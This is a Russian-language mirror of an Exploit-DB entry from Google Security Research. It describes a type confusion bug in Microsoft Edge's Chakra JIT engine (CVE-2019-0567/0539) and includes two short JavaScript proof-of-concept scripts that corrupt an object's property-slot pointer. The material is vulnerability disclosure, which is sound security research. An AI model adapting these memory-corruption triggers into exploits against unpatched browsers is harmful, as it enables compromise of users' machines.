- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 46203
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2019-0567 cve-2019-0539
- Дата публикации
- 2019-01-18
Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion
Код:
NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.
In the PoC, it overwrites the pointer to property slots with 0x1000000001234.
PoC for NewScObjectNoCtor:
function cons() {
}
function opt(o, value) {
o.b = 1;
new cons();
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
cons.prototype = {};
let o = {a: 1, b: 2};
opt(o, {});
}
let o = {a: 1, b: 2};
cons.prototype = o;
opt(o, 0x1234);
print(o.a);
}
main();
PoC for InitProto:
function opt(o, proto, value) {
o.b = 1;
let tmp = {__proto__: proto};
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
let o = {a: 1, b: 2};
opt(o, {}, {});
}
let o = {a: 1, b: 2};
opt(o, o, 0x1234);
print(o.a);
}
main();- Источник
- www.exploit-db.com
